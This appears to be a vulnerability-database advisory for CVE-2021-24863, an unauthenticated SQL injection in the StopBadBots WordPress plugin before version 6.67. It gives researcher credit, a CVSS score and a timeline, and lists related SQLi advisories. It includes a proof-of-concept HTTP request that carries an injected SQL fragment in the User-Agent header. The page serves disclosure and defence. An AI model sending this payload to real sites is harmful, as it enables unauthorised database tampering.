StopBadBots < 6.67 – Unauthenticated SQL Injection | CVE 2021-24863 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the User Agent before using it in a SQL statement to save it, leading to a SQL injection

Proof of Concept

GET / HTTP/1.1
User-Agent: Zongbot' where id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'-- -
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Affects Plugins

Fixed in 6.67

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

1e4dd002-6c96-44f9-bd55-61359265f7ae

Timeline

Publicly Published

2021-11-15 (about 2 years ago)

Added

2021-11-15 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2015-04-07

Title

All In One WP Security & Firewall <= 3.9.0 - Blind SQL Injection

Published

2015-09-15

Title

CP Reservation Calendar <= 1.1.6 - Unauthenticated SQL Injection

Published

2023-11-13

Title

Easy Newsletter Signups <= 1.0.4 - Admin+ SQLi

Published

2019-01-07

Title

Ninja Forms < 3.3.21.2 - SQL Injection

Published

2023-03-22

Title

Waiting: One-click Countdowns <= 0.6.2 - Subscriber+ SQLi